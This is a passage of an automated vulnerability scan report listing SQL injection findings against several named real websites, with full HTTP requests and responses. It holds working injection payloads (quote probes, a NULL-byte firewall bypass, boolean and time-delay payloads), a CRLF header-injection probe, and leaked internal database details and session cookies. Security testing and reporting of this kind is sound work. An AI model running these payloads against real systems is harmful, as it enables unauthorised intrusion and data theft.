<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=1'' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: sapha_tst_1''=TRUE; expires=Mon, 03-May-2021 22:06:44 GMT; path=/; domain=.sapha.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 5603

var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('conversionsuite.com','sapha.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','
...[SNIP]...

2.4. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=/1'2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '/1'2546'<br>
<b>MySQ
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=/1''2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


2.5. http://dce.sapha.com/logging.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /logging.php?ac=1'&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /logging.php?ac=1''&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


2.6. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s96203847790602

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 393
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www611
Content-Length: 0
Content-Type: text/html


2.7. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
xserver: www391
Content-Length: 0
Content-Type: text/html


2.8. http://poll.websitegear.com/compactpoll.asp [pollID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The pollID parameter appears to be vulnerable to SQL injection attacks. The payloads 18614847%20or%201%3d1--%20 and 18614847%20or%201%3d2--%20 were each submitted in the pollID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d1--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 19:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 98
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=AFHAMOBCGELDLCGBGJFDMJMG; path=/
Cache-control: private

An error occurred on the server when processing the URL. Please contact the system administrator.

Request 2

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d2--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:31:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=GFHAMOBCCFJPFMGMGBOLLEJL; path=/
Cache-control: private


2.9. https://secure.trust-guard.com/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 27759 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

